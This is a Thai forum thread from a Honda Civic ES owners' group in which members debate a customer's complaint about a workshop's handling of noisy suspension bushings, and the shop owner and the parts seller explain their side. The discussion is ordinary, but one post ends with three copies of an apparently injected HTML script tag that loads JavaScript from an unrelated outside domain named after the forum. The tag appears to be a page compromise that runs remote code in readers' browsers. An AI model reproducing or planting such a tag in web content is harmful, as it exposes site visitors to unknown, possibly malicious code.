ผมว่ามันเกิดจาการสือสารที่จะบอกงาน กับช่างเราจะต้องบอกเจ้าของร้านว่าจะทำอะไร เจ้าของร้านก็จะมีหน้าที่หาที่ลงให้คุณทำได้กี่โมงคิวไหน ถ้าเราไปบอกช่างช่างก็ทำงานที่ตนได้รับมอบหมายจากพี่ใหม่ให้เสร็จถึงจะมีคิว ผมเองทำรถเหมือนกันและทำที่นี้ สิ่งแรกที่ผมจะทำรถคือบอกพี่ใหม่ว่าจะทำอะไรผมรีบหรือไม่รีบมีคิวมัย ถ้าไม่มีผมไปทำ อย่างอื่นก่อนเดี๋ยวกลับมาทำ

ผมว่าทุกคนรักรถผมเข้าใจคุณคุณก็ต้องเข้าใจช่างเข้าใจคนทำว่าขันตอนการทำงานของร้านั้นเป็นยังงัย
ถ้าทางร้าหรือผมทำให้คุณไม่ถูกใจต้องขอโทษด้วยที่ทำให้คุณไม่พอใจกับบริการของทางร้านและของผม ที่ขายของมา 5 ปีคุณเป็นคนแรกและผมจะนำทุกคำพูดของคุณไปปรับปรุงตัวผมคับขอบคุณมากคับและขอโทษด้วยคับที่ทำให้เสียเวลา


เคลียร์แล้วนะครับ 
ได้รับคำขอบคุณจาก: song  visanu  es330  สมชาย  Rachen 
song


เข้าร่วม: 10 กุมภา 2011
ตอบ: 9833

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5558
ให้คำขอบคุณ: 4415

ที่อยู่: ESเมืองทอง 100%
ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
พุธ, 30 มกรา 2013 09:33 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
TEE_MONO พิมพ์ว่า:

เจมคร้าบ พิมพ์ว่า:
ขอแชร์ประสบการณ์หน่อยคับจากที่ได้ไปซื้อปีกนกค้ำล่างจากร้านชื่อดังร้านนึงย่านอุดมสุขคับ ผมเสียความรู้สึกมากเลยคับที่ได้รับบริการหลังการขายที่ไม่ค่อยน่าประทับใจเลยตอนที่ผมจะซื้อพูดจาดีมากแทบจนผมคิดว่าเอาหว่ะจะแต่งที่นี่แหล่ะให้ครบเลยแต่ก็ต้องมีเหตุให้ผมเปลี่ยนความคิดทันทีด้วยเหตุเกิดจาก ไอ้ตัวปีกค้ำล่างที่ผมไปถอยมาจากร้านดังนั้น มันมีเสียงดัง ผมลองเชคดูและสอบถามจากชาวesจึงรู้ว่าทางร้านไม่ได้อัดจารบีให้ผมเลยติดต่อไปทางร้านอีกครั้งเพื่อสอบถามว่าจะจัดการอย่างไรทางร้านได้บอกให้ผมมาเคลมได้ ผมจึงรีบมาเคลมทันทีนัดเวลาแล้วผมรีบไปตรงเวลาไปถึงทางร้านกลับไม่สนใจผมเลยเดินไปบอกช่างก็บ่ายเบี่ยงจนผมต้องโทรไปถามพี่ที่ขายของเค้าพูดจากับผมไม่ดีเลยผมเลยงงคับว่านี่ผมมาแก้งานที่เกิดจากทางร้านทำให้ผมไม่ดีนะไม่ใช่มาขอฟรีๆไม่ได้รับการบริการหลังการขายที่ดีเลยแถมยังมาคิดค่าบริการผมอีก ถ้ายังนี้หมายความว่าผมมาเสียค่าแก้งานไม่ใช่มาแก้งานที่ทางร้านทำให้ไม่ดีหน่ะซิ แต่โชคดีนิดนึงว่าผมเจอช่างคนนึงทำให้ผมดีทีเดียว ผมเสียความรู้สึกกับอู่นี้มากที่ตอนซื้อกับตอนบริการหลังการขายช่างต่างกันราวฟ้ากับเหวทั้งๆที่ช่วงที่ผมไปไม่มีลูกค้าเลย เลยอยากขอแชร์ให้เพื่อนๆรู้ว่ามีใครโดนแบบผมบ้าง ผมไปครั้งแรก ครั้งนี้เปนครั้งที่สองแล้วจะไม่ไปอีกแล้วคับ (ไม่ได้dis creditแต่อย่างใด)



เจมคร้าบ พิมพ์ว่า:
ผมก็เข้าใจคับ แต่ว่ารถใครใครก้รักคับรถเรามีปัญหาเราก็อยากแก้ให้จบแต่ในเมื่อทางร้านทำให้เราไม่ดี เค้าก้ต้องเคลมให้เราก็ถูกต้องแล้วนี่คับผมซื้อของติดตั้งไม่ถึงสองอาทิตย์เลยคร้าบพี่น้อง แต่มาคิดค่าบริการมันไม่แฟร์คับผมว่า ของชิ้นนึงหลักหมื่นอ่ะคับ แถมยังพูดตะคอกเราอีก มันเซ็งduck คับ 555ตรงนี้แหล่ะคับที่มันจี๊ดดดด!!!เสียตังยังเสียความรู้สึกอีก T_T




ผมตอบ คุณเจม เมื่อวานคุณเจมโทรหาผม สามรอบ ผมบอก อย่าเข้าไปเร็วเพราะทางร้าคิวมาก ให้เข้าไปเย็นหน่อยงานที่ร้านลน อยู่ แล้ว รอบสุดท้าย
คุณโทรมาตอนห้าโมงเย็น บอกถึงร้าน บอกช่างแล้ว ไม่มีใครสนใจ คุณโทรมาหาผม ผมบอกคุณว่า ไปหาช่างชื่อบีหรือ ไปหา พี่ใหม่แล้วบอกพี่ใหม่ เพราะถ้าหัวหน้าไม่ได้สั่งลูกน้องก็ทำงานอื่น ให้ไปบอกหัวหน้า แล้วผมย้ำให้ไปบอกพี่ใหม่ ประมาณห้านาที่พี่ใหม่โทรมาบอกผมว่ามีคนมาเคมบูชปีกนกหลัง ของ EK หรือ EG ประมาณนี้ ผมบอกให้เคมไปเลยมีของที่ร้าน ผมขายบูชผมให้เคมถ้าบูชมันแตกก่อนกำหนดในกรณีที่แตก เท่านั้น และในราคาที่ขายเข้าก็ทำความเข้าใจตั้งแต่ต้นว่าราคานี คุณซื้อไปไส่เอง ผมทั้งแนะนำทั้งบอกปัญหาคุณว่ามันหน้าจะเกิดจากอะไร วันที่คุณไส่ผมก็แค่เอาของมาส่งคุณ ไม่ได้ดูการไส่ด้วย
คำแนะนำของผมเมื่อว่านไม่มีคำหยาบเลยมีคำลงท้ายด้วยคำว่าครับทุกคำ

ผมว่ามันเกิดจาการสือสารที่จะบอกงาน กับช่างเราจะต้องบอกเจ้าของร้านว่าจะทำอะไร เจ้าของร้านก็จะมีหน้าที่หาที่ลงให้คุณทำได้กี่โมงคิวไหน ถ้าเราไปบอกช่างช่างก็ทำงานที่ตนได้รับมอบหมายจากพี่ใหม่ให้เสร็จถึงจะมีคิว ผมเองทำรถเหมือนกันและทำที่นี้ สิ่งแรกที่ผมจะทำรถคือบอกพี่ใหม่ว่าจะทำอะไรผมรีบหรือไม่รีบมีคิวมัย ถ้าไม่มีผมไปทำ อย่างอื่นก่อนเดี๋ยวกลับมาทำ

ผมว่าทุกคนรักรถผมเข้าใจคุณคุณก็ต้องเข้าใจช่างเข้าใจคนทำว่าขันตอนการทำงานของร้านั้นเป็นยังงัย
ถ้าทางร้าหรือผมทำให้คุณไม่ถูกใจต้องขอโทษด้วยที่ทำให้คุณไม่พอใจกับบริการของทางร้านและของผม ที่ขายของมา 5 ปีคุณเป็นคนแรกและผมจะนำทุกคำพูดของคุณไปปรับปรุงตัวผมคับขอบคุณมากคับและขอโทษด้วยคับที่ทำให้เสียเวลา




กระจ่าง! (เป็นกำลังใจให้ทั้ง2ฝ่าย นะครับ)
ได้รับคำขอบคุณจาก: tochi229  TEE_MONO  es330  Rachen 
Y u s Z a


เข้าร่วม: 09 ตุลา 2008
ตอบ: 536

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 355
ให้คำขอบคุณ: 198

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 30 มกรา 2013 09:56 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ของผมซื้อมาแรกๆ......ก็ดังครับ โทรไปปรึกษาพี่TEE MONOเค้าก็แนะนำดีให้ไปอัดจารบีเพิ่ม เสียงก็ลดลงนิดนึง แต่มันไม่ได้ดังตลอดนะครับเวลาวิ่งขึ้นเนินจริงๆเสียงถึงดัง วิ่งปกติไม่ดัง แต่พอใช้มาสักระยะบูชมันเข้าที่เข้าทาง เสียงมันก็จะหายหรือดังน้อยลงไปเองครับ ผมว่ามันเป็นปกติของบูชยูรีเทรนนะครับ อันนี้ผมรับได้เพราะมันไม่มีผลต่อการใช้งานครับ นอกจากรำคาญเสียงในช่วงแรกๆ ยังไงลองใช้ดูก่อนครับถ้าไม่ชอบจริงๆถอดขายมือ 2 ไปผมว่ามีคนรอซื้อครับ แล้วเปลี่ยนเป็นปีกที่ใช้บูชยางแทนครับ      
ได้รับคำขอบคุณจาก: tochi229  TEE_MONO  สมชาย 
HankMan


เข้าร่วม: 10 มกรา 2011
ตอบ: 424

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 359
ให้คำขอบคุณ: 749

ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 30 มกรา 2013 09:57 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ลองคุยกันให้เข้าใจอีกรอบดีกว่านะครับ พี่ๆ น้องๆ กันทุกคนครับ
ผมเองไม่ได้มีส่วนได้ส่วนเสียกับทั้ง 3 ฝ่าย จึงอยากให้คุยกันด้วยเหตุผลนะครับ และขอให้เรื่องทุกอย่างจบลงด้วยดีครับ
ได้รับคำขอบคุณจาก: tochi229  Y u s Z a  สมชาย 
mai


เข้าร่วม: 29 ตุลา 2008
ตอบ: 1053

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1855
ให้คำขอบคุณ: 3332
พุธ, 30 มกรา 2013 11:15 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
เจมคร้าบ พิมพ์ว่า:
ขอแชร์ประสบการณ์หน่อยคับจากที่ได้ไปซื้อปีกนกค้ำล่างจากร้านชื่อดังร้านนึงย่านอุดมสุขคับ ผมเสียความรู้สึกมากเลยคับที่ได้รับบริการหลังการขายที่ไม่ค่อยน่าประทับใจเลยตอนที่ผมจะซื้อพูดจาดีมากแทบจนผมคิดว่าเอาหว่ะจะแต่งที่นี่แหล่ะให้ครบเลยแต่ก็ต้องมีเหตุให้ผมเปลี่ยนความคิดทันทีด้วยเหตุเกิดจาก ไอ้ตัวปีกค้ำล่างที่ผมไปถอยมาจากร้านดังนั้น มันมีเสียงดัง ผมลองเชคดูและสอบถามจากชาวesจึงรู้ว่าทางร้านไม่ได้อัดจารบีให้ผมเลยติดต่อไปทางร้านอีกครั้งเพื่อสอบถามว่าจะจัดการอย่างไรทางร้านได้บอกให้ผมมาเคลมได้ ผมจึงรีบมาเคลมทันทีนัดเวลาแล้วผมรีบไปตรงเวลาไปถึงทางร้านกลับไม่สนใจผมเลยเดินไปบอกช่างก็บ่ายเบี่ยงจนผมต้องโทรไปถามพี่ที่ขายของเค้าพูดจากับผมไม่ดีเลยผมเลยงงคับว่านี่ผมมาแก้งานที่เกิดจากทางร้านทำให้ผมไม่ดีนะไม่ใช่มาขอฟรีๆไม่ได้รับการบริการหลังการขายที่ดีเลยแถมยังมาคิดค่าบริการผมอีก ถ้ายังนี้หมายความว่าผมมาเสียค่าแก้งานไม่ใช่มาแก้งานที่ทางร้านทำให้ไม่ดีหน่ะซิ แต่โชคดีนิดนึงว่าผมเจอช่างคนนึงทำให้ผมดีทีเดียว ผมเสียความรู้สึกกับอู่นี้มากที่ตอนซื้อกับตอนบริการหลังการขายช่างต่างกันราวฟ้ากับเหวทั้งๆที่ช่วงที่ผมไปไม่มีลูกค้าเลย เลยอยากขอแชร์ให้เพื่อนๆรู้ว่ามีใครโดนแบบผมบ้าง ผมไปครั้งแรก ครั้งนี้เปนครั้งที่สองแล้วจะไม่ไปอีกแล้วคับ (ไม่ได้dis creditแต่อย่างใด)



ผมเองเป็นคนที่ถูกพาดพิงจึงต้องออกมาชี้แจงให้เจ้าของกระทู้ได้ทราบ ต้องเข้าใจก่อนว่าของที่ใส่ไม่ไม่ใช่ของทางร้าน ที่ร้านทีหน้าทีใส่อย่างเดียว และถ้าใส่แล้วดังอันนี้ทางร้านเราก็เครมให้ โดยการใส่ให้ใหม่ โดยไม่มีค่าใช้จ่าย แต่เคสของคุณมันดังมาจากบู๊ชยาง ซึ่งปีกนกใหม่ผู้ผลิตเขาทาจาระบีมาอยู่แล้ว ก็เลยต้องมีการถอดใส่ใหม่อีกรอบ จึงมีค่าใช้จ่าย. แต่ถ้าเสียดายเงินสองร้อย ทำไมไม่ท้วงตอนจ่ายตังผมจะได้โทรคุยกับเจ้าของของนกว่าควรเก็บตังค์ที่ใครดี. และที่บอกว่าโทรมานัดคุณไม่ได้โทรหาผมแล้วผมจะทราบได้อย่างไรหล่ะครับ. ช่างเขาบ่ายเบี่ยงเพราะช่างเขาไม่รู้เรื่องคุณมาทำอะไร ทางร้านทำงานเป็นระบบโดยจากการสั่งงานจากผมคุณไปบอกช่าง ช่างก็ต้องบอกให้รอคุยกับผมอีกนั่นแหละ และผมเองก็ทำงานอยู่อู่ด้านหลัง จึงไม่ได้ออกมาต้อนรับคุณ ผมว่าเรื่องนี้มันเกิดจากการสื่อสารไม่เข้าใจกันมากกว่า
ได้รับคำขอบคุณจาก: EAK_75  tochi229  mosonic  TEE_MONO  sukhothai  kim_possible  cisco  KAATO  etabb  es330  body19  Y u s Z a  tokmun002  phichetza  numxs  mayuct  koobe  kittidech  lkki5  domziia  pannatad  TIRL_ES    artemis007  pakthepizza  DRINK  DEAR ES 02  Rachen  ome_RX 
mosonic


ชื่อเล่น: โม

เข้าร่วม: 25 พฤษภาคม 2011
ตอบ: 1063

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 551
ให้คำขอบคุณ: 349

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 30 มกรา 2013 11:38 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
Y u s Z a พิมพ์ว่า:
ของผมซื้อมาแรกๆ......ก็ดังครับ โทรไปปรึกษาพี่TEE MONOเค้าก็แนะนำดีให้ไปอัดจารบีเพิ่ม เสียงก็ลดลงนิดนึง แต่มันไม่ได้ดังตลอดนะครับเวลาวิ่งขึ้นเนินจริงๆเสียงถึงดัง วิ่งปกติไม่ดัง แต่พอใช้มาสักระยะบูชมันเข้าที่เข้าทาง เสียงมันก็จะหายหรือดังน้อยลงไปเองครับ ผมว่ามันเป็นปกติของบูชยูรีเทรนนะครับ อันนี้ผมรับได้เพราะมันไม่มีผลต่อการใช้งานครับ นอกจากรำคาญเสียงในช่วงแรกๆ ยังไงลองใช้ดูก่อนครับถ้าไม่ชอบจริงๆถอดขายมือ 2 ไปผมว่ามีคนรอซื้อครับ แล้วเปลี่ยนเป็นปีกที่ใช้บูชยางแทนครับ






ผมก็เป็นอีคนที่ ใช้บริการจากทั้ง สองท่าน นะครับ ไม่ได้สนิท ต้องบอกว่าที่ร้านพรเทพ คนเยอะจริง ๆ ทุกวัน พี่ใหม่เคยบอกจนน้ำตาแทบไหล ลูกค้าทุกคน เหมือนกัน บางคนมาไกล เราต้องเห็นใจเค้า ผมเคยถามแก ว่าไม่หยุดบ้างหรอพี่ แกบอกว่า แล้วคนที่เค้าไม่รู้ว่าเราหยุดล่ะ มาไกล ค่าน้ำมันล่ะ แกเลยไม่อยากให้ทุกคนเสียโอกาศ ผมว่า งานที่ร้านเยอะ และ เวลา ที่ จขกท บอกเป็นเวลาที่น่าจะิดร้านแล้ว เป็นการเข้าใจผิดมากกว่


ส่วนพี่ตี๋ ยืนยันเลยครับ เป็นคนที่ ถามเราก่อนทุกครั้ง แนะนำทุกอย่าง ยอมรับในของได้ไหม เป็นคนที่จริงใจ พูดจาจะดูเฉย ๆ หน่อย เป็นกันเอง แต่งานที่ออกมาเรายอมรับได้
ได้รับคำขอบคุณจาก: tochi229  TEE_MONO  es330  Y u s Z a  numxs  สมชาย  domziia 
shaiyanan


เข้าร่วม: 11 ตุลา 2011
ตอบ: 3

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 6
ให้คำขอบคุณ: 0
พุธ, 30 มกรา 2013 12:27 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
จากประสบการณ์ที่ใช้บริการที่อู่นี้ บอกกันตรงๆ อย่าโกรธน๊ะครับถือว่าแนะเพื่อปรับปรุง แต่ปรับไม่ได้ก็ไม่เป็นไร
แรกๆ ชอบใช้บริการ ร้านพี่ใหม่มาก เพราะ ราคาถูก กว่าที่อื่น แน่ๆ ไม่เคยรู้สึกว่าโดนฟันเลยแม้แต่ครั้งเดียว ข้อมูลก็ตรง ปรึกษาได้เป็นส่วนใหญ่
หลังๆ คิวนานมาก ทำรถกันทีเป็นวัน ถ้าเข้าหลัง 10 โมง ตัดใจไม่ไปดีกว่า บรรยากาศตอนเข้าร้าน จะไม่ค่อยมีช่างมาสนใจเรา เท่าไร่ ก็เป็นเพราะงานเค้าเยอะเห็นๆ ส่วนพี่ใหม่ เอง นิสัยส่วนตัว ก็ค่อนข้างพูดน้อย บางครั้งก็เจอ ถามคำตอบคำ เหมือนกัน แต่ก็ไม่คิดอะไร เอาว่าดีกว่าเข้าที่อื่น เวลาโดนฟัน มันเสียความรู้สึก ถ้าจะให้แนะก็
1.  อยากให้ขยายอู่ซ๊ะที ลูกค้าก็ติดเยอะออก ไม่ขยาย ก็เปิด ระแวกใกล้ๆ ก็ได้ ยินดีไปใช้บริการอยู่แล้ว งานเยอะ หนักเหนื่อย ช่างก็อารมณ์เสีย
ลูกค้าก็เสียอารมณ์ มาไกลแต่ไม่ได้ซ่อม เจอช่าง ไม่ใส่ใจอีก ยิ่งไปกันใหญ่ หลังๆ เลือกได้ ไปซ่อมที่อื่น ดีกว่าขี้เกียจรอ ยกเว้น เลือกไม่ได้จิงๆ ถึงจะไปพึ่งพาพี่เค้า ต้องเข้าใจน๊ะครับ แต่ผมก็มักจะแนะให้เพื่อนๆ ในระแวกนี้ ไปซ่อมที่นี่ เพราะจบ และอยู่ในงบแน่ๆ
2.  ตัวพี่ใหม่เอง น่าจะประจำหน้าอู่ไปเลย บางทีไปรอเป็น ชม. 2 ชม. กว่าจะได้คุยงาน
ก็แค่นี้ บางเรื่อง เล็กๆ น้อยๆ ไม่เก็บมาใส่ใจ แต่ยังยืนยันว่าจะเป็นลูกค้าประจำต่อไป
ได้รับคำขอบคุณจาก: tochi229  kaisuh  Y u s Z a  TEE_MONO  สมชาย  mayuct 
akkarin_c


ชื่อเล่น: ตู่

เข้าร่วม: 01 สิงหา 2012
ตอบ: 1225

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1081
ให้คำขอบคุณ: 441

ที่อยู่: เตาปูน ปิ่นเกล้า อัมพวา
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 30 มกรา 2013 12:56 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
พี่เค้าขยายแล้วนะครับ อีกที่หนึ่งอยู่ด้านหลัง
ส่วนเรื่องบุคลิคช่าง ส่วนใหญ่ทุกอู่ก็เป็นแบบนี้แหละครับ

ร้านเค้ารับผิดชอบให้ผมว่าก็น่าจะวินๆ แล้วนะครับ
ได้รับคำขอบคุณจาก: tochi229  Y u s Z a  TEE_MONO  สมชาย 
fasang.Mr


ชื่อเล่น: บี

เข้าร่วม: 23 มีนา 2010
ตอบ: 2101

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1764
ให้คำขอบคุณ: 2323

ที่อยู่: นนทบุรี-ประจวบฯ-พะเยา
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 30 มกรา 2013 13:10 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ไม่มีส่วนได้และเสียกับทุกท่าน แต่ที่เคยเจอคือ ผมอยู่นนทบุรี ไปอุดมสุข หลงด้วย ถึงร้านประมาณ 7.15 น. จอดรถข้างธนาคาร คิวงานที่ 3 ซ่อมชุดแม่ปั๊มบน กลับบ้าน 6 โมงเย็น ไม่หายไปอีกรอบถึงเวลาเดิมประมาณ 7.00น. รอเปลี่ยนชุดแม่ปั๊มบนและอื่นๆอีกหลายรายการวันอาทิตย์ร้านส่งอะไหล่ปิด พี่อ้วนๆ ผิวเข้มๆ หน้าเครียดๆ ขี่มอไซด์สีแดงๆหาอะไหล่ให้ เปลี่ยนเสร็จทดสอบรถประมาณ หกโมงกว่าๆ รับรถประมาณ ทุ่มหนึ่ง คิดดูละกันถึงบ้านกี่โมง ว่าจะไปอีกรอบโช็คหลังซึม"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: tochi229  Y u s Z a  TEE_MONO  phichetza  สมชาย  koobe 
momo0101


ชื่อเล่น: เบิร์ด

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1112

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3057
ให้คำขอบคุณ: 1628

ที่อยู่: Bangkok-Ayuttaya
ปี: 2001
สี: แดง ไฟร์เปปเปอร์ (R-507P)
พุธ, 30 มกรา 2013 13:51 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
เพิ่งไปทำที่ร้าน พี่ใหม่ มาล่าสุด เข้าใจเลยว่า งานเยอะ และยุ่งมากๆ
ยังนึกอยู่เลย ว่า เถ้าแก่ร้านหรอนี่ วุ่นวาย ยังกะช่างเลย


ใจเย็นๆ เข้าใจกันไวๆ นะครับ 
ได้รับคำขอบคุณจาก: tochi229  Y u s Z a  TEE_MONO  phichetza  สมชาย 
KAATO


เข้าร่วม: 05 กรกฎา 2010
ตอบ: 572

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 2827
ให้คำขอบคุณ: 2815

ปี: 2001
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
พุธ, 30 มกรา 2013 14:07 - แชร์ประสบการณ์ กับการบริการแย่ของร้านนึงครับ
ผมเองก็เป็นคนที่ใช้บริการของร้านพี่ใหม่อยู่เนืองๆนะครับ ขอเล่าเป็นประเด็นไปนะ



-ควรโทรไปถามคิวพี่ใหม่ตั้งแต่เนิ่นๆ ผมก็โทรเช็คถามตลอด พี่ใหม่ก็จะจัดคิวให้ เอารถเข้าไปตามที่นัด งานก็เดิน ทุกอย่าง วิน-วิน

-เรื่องอะไหล่ต่างๆที่ซื้อมาจากข้างนอก พี่ใหม่เขาก็รับทำให้
แต่อะไหล่ที่เอามา เราก็ไม่รู้ว่า ธรรมชาติของมันเป็นของที่จะมีผลข้างเคียงกับการใช้งานรึป่าว อันนี้ก็ศึกษาตามพอประมาณครับ จะได้ไม่เครียด

-ระหว่างซ่อม ถ้าอันไหนไม่เข้าใจก็ถามพี่ใหม่ได้ครับ ผมได้ความรู้ตลอด แต่เนื่องจากพี่ใหม่จัดการดูแลอะไรหลายๆอย่างด้วยตัวคนเดียว อาจจะไม่ได้ดูแลเราตลอดเวลา

- ร้านพี่ใหม่ ไม่ใช่ศูนย์บริการ การจะคาดหวังว่าจะได้นั่งรอสบายๆ มีคนดูแลจัดเตรียมให้เราหมดนั้นยาก ร้อน ลำบาก เหนื่อย แต่ผมกลับชอบแบบนี้มากกว่า ไม่รู้ทำไม
ได้รับคำขอบคุณจาก: tochi229  visanu  es330  Y u s Z a  TEE_MONO  tokmun002  phichetza  billy1itim  สมชาย  mayuct 
ตอบ
หน้า 1 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.